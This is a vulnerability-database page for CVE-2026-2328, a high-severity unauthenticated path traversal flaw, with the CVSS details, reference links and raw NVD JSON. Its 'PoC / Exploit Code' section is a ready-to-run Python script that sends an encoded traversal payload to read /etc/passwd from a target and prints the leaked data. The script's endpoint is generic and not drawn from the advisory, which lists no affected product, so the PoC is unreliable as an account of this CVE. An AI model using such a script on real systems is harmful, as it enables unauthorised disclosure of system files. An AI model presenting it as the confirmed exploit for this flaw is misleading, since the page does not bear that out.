CVE-2026-2328

Description

An unauthenticated remote attacker can exploit insufficient input validation to access backend components beyond their intended scope via path traversal, resulting in exposure of sensitive information.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

未知版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_path_traversal(url):
    """
    PoC for CVE-2026-2328 Path Traversal Vulnerability
    """
    # Common traversal payload to access /etc/passwd on Linux
    traversal_payload = "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
    target_url = f"{url}/api/v1/resource?file={traversal_payload}"
    
    try:
        response = requests.get(target_url, timeout=5)
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Vulnerability confirmed! Sensitive data leaked.")
            print(f"[+] Response snippet: {response.text[:100]}")
        else:
            print("[-] Vulnerability not detected or target patched.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    check_path_traversal(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2328
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2328
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2328/
[4] VulDB https://vuldb.com/cve/CVE-2026-2328
[5] https://certvde.com/de/advisories/VDE-2026-010

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2328", "sourceIdentifier": "[email protected]", "published": "2026-03-30T08:16:17.210", "lastModified": "2026-03-30T13:26:07.647", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote attacker can exploit insufficient input validation to access backend components beyond their intended scope via path traversal, resulting in exposure of sensitive information."}, {"lang": "es", "value": "Un atacante remoto no autenticado puede explotar una validación de entrada insuficiente para acceder a componentes de backend más allá de su alcance previsto mediante salto de ruta, lo que resulta en la exposición de información sensible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-790"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-010", "source": "[email protected]"}]}}